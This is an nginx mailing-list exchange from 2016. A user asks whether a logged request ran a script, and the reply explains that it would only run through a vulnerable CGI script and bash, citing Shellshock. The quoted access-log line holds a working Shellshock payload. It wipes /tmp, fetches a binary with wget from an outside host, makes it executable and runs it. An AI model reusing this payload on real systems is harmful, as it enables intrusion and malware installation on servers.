Bash script; Was it executed?
Richard Stanway
r1ch+nginx at teamliquid.net
Sat Jul 30 19:06:48 UTC 2016
Not unless your / location passes the request to a vulnerable cgi-script
using a vulnerable version of bash.
See https://en.wikipedia.org/wiki/Shellshock_(software_bug)
On Sat, Jul 30, 2016 at 7:57 PM, lists at lazygranch.com <lists at lazygranch.com>
wrote:
> I see a return code of 200. Does that mean this script was executed?
> -------------
> 219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643
> "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget
> http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
> >> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod
> >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma
> >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod
> >> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm
> >> >> -rf /tmp/*;echo wget http://houmen
> .linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
> >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod
> >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma
> >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7
> 77 /tmp/Run.sh;/tmp/Run.sh\x22"
> -------------------------
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.nginx.org/pipermail/nginx/attachments/20160730/401082aa/attachment.html>
More information about the nginx
mailing list